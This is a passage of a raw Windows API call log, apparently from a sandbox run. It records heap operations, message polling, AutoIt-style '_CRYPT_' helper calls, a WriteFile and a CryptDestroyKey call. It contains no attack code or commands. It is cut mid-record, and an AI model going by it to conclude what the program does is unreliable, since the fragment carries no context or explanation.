lpMsg=0x8ced58) returned 0 [0142.474] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0142.474] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0142.474] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.474] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.474] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.474] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.474] WriteFile (in: hFile=0x2a0, lpBuffer=0x978490*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x978490*, lpNumberOfBytesWritten=0x8cf5e4*=0x120, lpOverlapped=0x0) returned 1 [0142.476] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.476] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.476] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0142.476] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0142.476] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0142.476] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0142.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0142.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0142.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50890, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0142.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0142.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0142.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0142.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0142.477] CryptDestroyKey (hKey=0xa86f90) returned 1 [0142.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0142.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0142.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0142.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0142.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0142.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0142.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0142.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0142.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0142.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0142.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0142.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0142.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0142.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0142.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0142.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0142.479] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0142.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0142.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0142.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0142.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0142.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0142.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0142.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0142.480] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0142.480] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0142.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0142.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0142.480] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0142.480] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0142.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0142.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0142.480] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0142.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0142.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0142.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0142.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0142.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0142.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0142.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0142.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0142.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0142.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0142.482] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0142.482] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0142.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0142.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0142.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0142.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0142.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0142.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0142.482] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0142.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0142.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0142.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0142.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0142.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0142.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0142.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0142.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0142.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0142.483] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0142.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0142.483] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0142.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0142.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0142.483] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0142.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0142.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0142.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0142.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0142.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0142.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0142.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0142.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0142.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0142.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0142.484] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0142.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0142.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0142.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0142.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0142.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0142.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0142.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0142.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0142.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0142.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0142.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0142.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0142.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0142.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0142.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0142.486] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0142.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0142.486] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0142.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0142.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0142.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0142.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 